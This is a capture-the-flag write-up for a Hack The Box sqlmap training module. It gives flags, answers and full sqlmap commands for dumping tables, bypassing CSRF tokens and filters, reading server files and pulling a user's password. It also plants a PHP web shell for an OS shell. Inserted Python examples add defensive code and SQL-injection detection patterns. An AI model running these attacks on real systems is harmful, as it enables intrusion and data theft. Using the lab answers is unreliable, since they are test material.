SQLMap Essentials

Uploaded by chatgpt192

Link to challenge: https://academy.hackthebox.com/module/58 (log in required)
Class: Tier II | Easy | Offensive

Getting Started
SQLMap Overview:
Question: What's the fastest SQLi type?
Answer: UNION query-based
Method: ‘Error-based SQLi is considered as faster than all other types, except UNION query-based, because it can retrieve a limited amount (e.g., 200 bytes) of data called "chunks" through each request.’

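As an added illustration that is not part of the module or this write-up, the following Python script (sqlite3, in-memory, with a constructed schema and a made-up flag value) shows why a UNION query can pull a whole second table in one request when the id parameter is pasted into the SQL text the way the lab pages do, and how binding the parameter closes the hole.

```python
import sqlite3

# Added example, not code from the HTB module or this write-up.
# Constructed schema: "products" is the table the page is meant to query,
# "flag1" stands in for a table the application never intended to expose.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 'keyboard'), (2, 'mouse');
        CREATE TABLE flag1 (id INTEGER, content TEXT);
        INSERT INTO flag1 VALUES (1, 'FLAG{constructed-sample-value}');
    """)
    return con

def lookup_vulnerable(con, user_id):
    """Pastes the raw request parameter into the SQL text (the lab's case1.php pattern)."""
    sql = f"SELECT id, name FROM products WHERE id = {user_id}"
    return con.execute(sql).fetchall()

def lookup_parameterized(con, user_id):
    """Binds the parameter; the engine never parses the value as SQL."""
    return con.execute("SELECT id, name FROM products WHERE id = ?", (user_id,)).fetchall()

def lookup_validated(con, user_id):
    """Belt and braces: reject anything that is not an integer before it reaches the query."""
    if not str(user_id).isdigit():
        raise ValueError("id must be a positive integer")
    return lookup_parameterized(con, int(user_id))

# A UNION payload of the kind sqlmap builds once it knows the column count
# (compare the --union-cols=5 run in Case #7); the hidden table comes back in one request.
UNION_PAYLOAD = "1 UNION ALL SELECT id, content FROM flag1"

if __name__ == "__main__":
    con = build_db()
    print("benign, vulnerable:     ", lookup_vulnerable(con, "1"))
    print("payload, vulnerable:    ", lookup_vulnerable(con, UNION_PAYLOAD))
    print("payload, parameterized: ", lookup_parameterized(con, UNION_PAYLOAD))
    try:
        lookup_validated(con, UNION_PAYLOAD)
    except ValueError as exc:
        print("payload, validated:      rejected:", exc)
```

Run it directly to see the results side by side. The point for whoever owns the code: sqlmap's --dump works against the first function and has nothing to work with against the second, whatever --level and --risk are set to.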
Building Attacks
Running SQLMap on an HTTP Request:
Question: What's the contents of table flag2? (Case #2)
Answer: HTB{700_much_c0n6r475_0n_p057_r3qu357}
Method: first, let's open the website itself in the browser:
http://<target-IP>:<target-port>/
We select ‘Case #2’:

We are instructed to investigate the POST parameter ‘id’.

For that we run sqlmap with the command:
sqlmap -u "http://<target-IP>:<target-port>/case2.php" --data='id=1' --method POST --batch --dump

Now, there will be A LOT of output; only the relevant parts are shown in the screenshots:
[screenshot]

We answer ‘Y’ here..

[screenshot]

Parameter ‘id’ is injectable through several techniques, like this..

[screenshot]

Parameter ‘id’ is vulnerable.. we can stop testing.. and get to the results…
[screenshot]
Found the flag in database ‘testdb’, table ‘flag2’. It is also saved to a CSV file.

Question: What's the contents of table flag3? (Case #3)


Answer: HTB{c00k13_m0n573r_15_7h1nk1n6_0f_6r475}
Method: let's select ‘Case #3’ in the main dashboard:

When selecting ‘click here’ we get to the ‘id=1’ value:

Anyway, they tell us to investigate the URL with the cookie ‘id=1’, so let's run:
sqlmap -u "http://<target-IP>:<target-port>/case3.php" --cookie="id=1" --dbs --dump --batch --level=5 --risk=3
We get output in a format familiar from case #2, which will not be repeated here.. however, at the end of it….:

Here is an explanation of the flags:
[screenshot]

Question: What's the contents of table flag4? (Case #4)
Answer: HTB{j450n_v00rh335_53nd5_6r475}
Method: let's open the ‘case4’ page (how to get there was already covered):

Here we are dealing with JSON data: ‘{"id": 1}’. We run the command:
sqlmap -u "http://<target-ip>:<target-port>/case4.php" --data='{"id": 1}' --dbs --dump --batch --level=5 --risk=3 --header="Content-Type: application/json"
and the rest goes the same as the previous injections:

Attack Tuning:
Question: What's the contents of table flag5? (Case #5)
Answer: HTB{700_much_r15k_bu7_w0r7h_17}
Method:

sqlmap -u "http://<target-ip>:<target-port>/case5.php?id=1" --dbs --dump --batch --level=5 --risk=3 -T flag5 --no-cast

[screenshot]
Question: What's the contents of table flag6? (Case #6)
Answer: HTB{v1nc3_mcm4h0n_15_4570n15h3d}
Method:

sqlmap -u "http://<target-IP>:<target-port>/case6.php?col=id" --dbs --dump --batch --level=5 --risk=3 -T flag6 --no-cast
[screenshot]


Question: What's the contents of table flag7? (Case #7)


Answer: HTB{un173_7h3_un173d}
Method:

sqlmap -u "http://<target-IP>:<target-port>/case7.php?id=1" --union-cols=5 -D testdb -T flag7 --no-cast --dump --batch --level=5 --risk=3
[screenshot]
Database Enumeration
Database Enumeration:
Question: What's the contents of table flag1 in the testdb database? (Case #1)
Answer: HTB{c0n6r475_y0u_kn0w_h0w_70_run_b451c_5qlm4p_5c4n}
Method:

sqlmap -u "http://<target-IP>:<target-port>/case1.php?id=1" -D testdb -T flag1 --no-cast --dump --batch --level=5 --risk=3

[screenshot]
Advanced Database Enumeration:
Question: What's the name of the column containing "style" in its name? (Case #1)
Answer: PARAMETER_STYLE
Method: we run the command:
sqlmap -u "http://<target-IP>:<target-port>/case1.php?id=1" --search -C style --batch --level=5 --risk=3 --no-cast

[screenshot]


Question: What's the Kimberly user's password? (Case #1)


Answer: Enizoom1609
Method: we assume from prior experience and the section's guide that the column holding Kimberly's username is ‘name’ and the password column is ‘password’.
We also assume that the database is named ‘testdb’ and the table ‘users’.
Let's list the columns first, for good order:
sqlmap -u "http://<target-IP>:<target-port>/case1.php?id=1" -D testdb -T users --columns --batch --level=5 --risk=3 --no-cast

[screenshot]

Now that we are confident that the columns are ‘name’ and ‘password’, let's extract Kimberly's password:
sqlmap -u "http://<target-IP>:<target-port>/case1.php?id=1" -D testdb -T users --dump -C name,password --batch --level=5 --risk=3 --no-cast --where "name LIKE '%Kimberly%'"
[screenshot]
Advanced SQLMap Usage
Bypassing Web Application Protections:
Question: What's the contents of table flag8? (Case #8)
Answer: HTB{y0u_h4v3_b33n_c5rf_70k3n1z3d}
Method: first, we need to obtain the token. Let's start Burp Suite:
burpsuite
Go to Proxy, open the browser and enter the case8 URL:

Now, we turn the interceptor on and press ‘submit’:

Burp Suite intercepted the request, and on line 16 we can observe our CSRF (cross-site request forgery) token value; the parameter is called ‘t0ken’.
Now we can insert that into our sqlmap command:
sqlmap -u "http://<target-IP>:<target-port>/case8.php" --data="id=1&t0ken=<token-value>" --csrf-token="t0ken" --batch --level=5 --risk=3 --dbs --dump -T flag8 --no-cast
*here <token-value> is ‘Q0UZYzaFpsjkRsRGscxv0j3BbhWPDuVLRnrH3tpRdtA’, but of course it may change for every request; --csrf-token="t0ken" tells sqlmap which parameter carries the anti-CSRF token so it can fetch a fresh one for each request.*

[screenshot]
Question: What's the contents of table flag9? (Case #9)
Answer: HTB{700_much_r4nd0mn355_f0r_my_74573}
Method:

There is a ‘click here’ button, let's click it:

There are the parameters ‘id=1&uid=<uid-value>’.

We need to randomize the uid. We will use the command:
sqlmap -u "http://<target-IP>:<target-port>/case9.php?id=1&uid=12345" --randomize=uid --batch --level=5 --risk=3 --dbs --dump -T flag9 --no-cast
[screenshot]


Question: What's the contents of table flag10? (Case #10)


Answer: HTB{y37_4n07h3r_r4nd0m1z3}
Method:

This is a bit similar to case 2, so first let's try running the case 2 command against case10:
sqlmap -u "http://<target-IP>:<target-port>/case10.php" --data='id=1' --method POST --batch --dump -T flag10 --no-cast
[screenshot]
we will get this error:

[screenshot]

At the end of the scan the output suggests using ‘--random-agent’, and that is what we are going to do:
sqlmap -u "http://<target-IP>:<target-port>/case10.php" --data='id=1' --method POST --batch --dump -T flag10 --no-cast --random-agent

[screenshot]
Question: What's the contents of table flag11? (Case #11)
Answer: HTB{5p3c14l_ch4r5_n0_m0r3}
Method:

We will use the tamper script ‘between’:

sqlmap -u "http://<target-IP>:<target-port>/case11.php?id=1" --tamper=between --batch --level=5 --risk=3 --dbs --dump -T flag11 --no-cast

[screenshot]
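Cases #10 and #11 show the two evasions a defender has to plan for: --random-agent hides sqlmap's default User-Agent, and the between tamper rewrites = into BETWEEN x AND x so a filter keyed on special characters misses it. The following Python log scanner is an added example, not from the module or this write-up; the access-log lines are constructed, and the tampered one is shaped after the documented behaviour of the between tamper. It shows that a User-Agent rule alone catches only the untampered run, and that rules on the payload shape are what pick up the other two.

```python
import re
from urllib.parse import unquote_plus

# Added example; these combined-format access-log lines are constructed, not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /case1.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [12/Mar/2024:10:00:02 +0000] "GET /case1.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"',
    '10.0.0.9 - - [12/Mar/2024:10:00:03 +0000] "GET /case7.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20- HTTP/1.1" 200 734 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '10.0.0.9 - - [12/Mar/2024:10:00:04 +0000] "GET /case11.php?id=1%20AND%205%20BETWEEN%205%20AND%205 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Rules applied to the URL-decoded request path (query string included).
PAYLOAD_RULES = {
    "union-select":   re.compile(r"\bUNION\b.*\bSELECT\b", re.I),
    "boolean-probe":  re.compile(r"\b(AND|OR)\b\s+\S+\s*=\s*\S+", re.I),
    "between-tamper": re.compile(r"\bBETWEEN\b\s+\S+\s+AND\b", re.I),
    "time-delay":     re.compile(r"\b(SLEEP|BENCHMARK|WAITFOR)\b", re.I),
}
# Rule applied to the User-Agent header; --random-agent defeats this one on its own.
UA_RULE = re.compile(r"sqlmap", re.I)

def parse(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return the set of rule names a parsed entry trips."""
    hits = set()
    if UA_RULE.search(entry["ua"]):
        hits.add("sqlmap-user-agent")
    decoded = unquote_plus(entry["path"])
    for name, rx in PAYLOAD_RULES.items():
        if rx.search(decoded):
            hits.add(name)
    return hits

def scan(lines):
    """Return {line_number: rule names} for every line that tripped at least one rule."""
    findings = {}
    for n, line in enumerate(lines, 1):
        entry = parse(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings[n] = hits
    return findings

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(sorted(hits))}")
```

Only GET query strings appear in a standard access log, so the POST-body, cookie and JSON injections of cases #2 to #4 need request-body logging (or WAF logs) before rules of this kind can see them.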
OS Exploitation:
Question: Try to use SQLMap to read the file "/var/www/html/flag.txt".
Answer: HTB{5up3r_u53r5_4r3_p0w3rful!}
Method: first we need to determine that we have DBA (Database Administrator) privileges, which allow us to read files.
As the target website has the ‘id=1’ parameter:

we will use the command:

sqlmap -u "http://<target-IP>:<target-port>/?id=1" --is-dba --batch

[screenshot]
The value ‘True’ means we do have DBA privileges, which is great! We may proceed:
sqlmap -u "http://<target-IP>:<target-port>/?id=1" --file-read "/var/www/html/flag.txt" --batch

[screenshot]

The file's content was saved on our machine in the following file. Let's get it:
cat /home/<attacking-box-user>/.local/share/sqlmap/output/<target-IP>/files/_var_www_html_flag.txt
Question: Use SQLMap to get an interactive OS shell on the remote host and
try to find another flag within the host.
Answer: HTB{n3v3r_run_db_45_db4}
Method: first let's create a PHP shell payload and write it to the target machine via SQL:
echo '<?php system($_GET["cmd"]); ?>' > shell.php

sqlmap -u "http://<target-IP>:<target-port>/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

[screenshot]

We should now be able to give commands to the target machine; let's test it with something basic:
curl http://<target-IP>:<target-port>/shell.php?cmd=ls
It works (and that flag is the one already obtained, ignore it).

Now sqlmap provides us with a built-in way to obtain a shell on the target machine, after shell.php has been written to it:
sqlmap -u "http://<target-IP>:<target-port>/?id=1" --os-shell --batch

[screenshot]

Let's find the flag:

find / -type f -name flag.txt | grep flag.txt
The second flag is in the root path ‘/’, let's get it:
cat /flag.txt
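The second flag of this section spells out the lesson (never run the database as a DBA): --is-dba, --file-read and --file-write only worked because the application's database account held global administrative privileges. As an added example, not from the module or this write-up, the following Python audit parses SHOW GRANTS statements (constructed sample output for three hypothetical accounts) and flags the global MySQL privileges that make those primitives possible: FILE (behind LOAD_FILE() and SELECT ... INTO OUTFILE), SUPER (the administrative privilege a positive --is-dba reflects), and ALL PRIVILEGES, which contains both.

```python
import re

# Added example; the SHOW GRANTS output below is constructed for three hypothetical accounts.
SAMPLE_GRANTS = {
    "webapp@localhost": [
        "GRANT ALL PRIVILEGES ON *.* TO 'webapp'@'localhost' WITH GRANT OPTION",
    ],
    "shop@localhost": [
        "GRANT USAGE ON *.* TO 'shop'@'localhost'",
        "GRANT SELECT, INSERT ON `production`.* TO 'shop'@'localhost'",
    ],
    "reporting@localhost": [
        "GRANT SELECT, FILE ON *.* TO 'reporting'@'localhost'",
    ],
}

GRANT_RE = re.compile(r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\b", re.I)

# Global privileges that turn a SQL injection into file read/write and DBA-level access:
# FILE backs LOAD_FILE() and INTO OUTFILE, SUPER is the administrative privilege,
# ALL PRIVILEGES on *.* includes both of them.
DANGEROUS_GLOBAL = {"ALL PRIVILEGES", "FILE", "SUPER"}

def parse_grant(statement):
    """Return (set of privilege names, scope) for one GRANT statement, or None."""
    m = GRANT_RE.match(statement.strip())
    if not m:
        return None
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    return privs, m.group("scope")

def audit_grants(grants_by_user):
    """Return {user: sorted reasons} for accounts holding dangerous global privileges."""
    report = {}
    for user, statements in grants_by_user.items():
        reasons = []
        for stmt in statements:
            parsed = parse_grant(stmt)
            if parsed is None:
                continue
            privs, scope = parsed
            if scope != "*.*":
                continue  # FILE and SUPER only exist at global scope
            for p in sorted(privs & DANGEROUS_GLOBAL):
                reasons.append(f"{p} on *.*")
        if reasons:
            report[user] = reasons
    return report

if __name__ == "__main__":
    for user, reasons in audit_grants(SAMPLE_GRANTS).items():
        print(f"{user}: {'; '.join(reasons)}")
```

Feed it the output of SHOW GRANTS FOR 'user'@'host' for each application account. Alongside trimming the grants, setting MySQL's secure_file_priv to a dedicated directory (or NULL, which disables file operations entirely) keeps LOAD_FILE() and INTO OUTFILE away from /var/www/html even for an account that still holds FILE.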
Skills Assessment
Skills Assessment:
Question: What's the contents of table final_flag?
Answer: HTB{n07_50_h4rd_r16h7?!}
Method: **note: as this section took me several sessions to complete, the target IP and port will occasionally change across the screenshots.**
First, I will describe some failed attempts: running sqlmap against the GET requests of the ordinary pages, or the POST requests of those pages.

We need to find a proper POST page which is vulnerable to SQL injection.
Brute forcing with tools like gobuster or ffuf will not work properly (not for me anyway). We will have to find that POST request manually.
Most of the supposedly POST-generated requests on this target website, like review submitting or item checkout, are disabled.
So, we will use Burp Suite for that task. Let's open the Burp Suite browser in proxy mode and enter the website (enter <target-IP>:<target-port> in the URL bar):

Let's go to Catalog → Shop:

Now it's time to activate the proxy interceptor on the shop page; we will select some item (in this write-up it is the first one)

and its POST request will be intercepted by the proxy.

Let's right-click the request and save the item to a file ‘request.txt’:

Now, there was some trial and error with the command parameters, especially which tamper to choose for the SQL injection; however, this is the initial one:
sqlmap -r request.txt --tamper=between --dump --batch --no-cast --level=5 --risk=3
the command will base its attack on the request stored in the ‘request.txt’ file:

[screenshot]

We can observe here that there is a database ‘production’, and in it the table ‘final_flag’.
As the current command will fetch the entire database, which is quite a lot and, due to how the command works, will take some time, we will halt the current command and run a more focused search on the ‘final_flag’ table in the ‘production’ database:
sqlmap -r request.txt --tamper=between --dump --batch --no-cast --level=5 --risk=3 -D production -T final_flag
[screenshot]
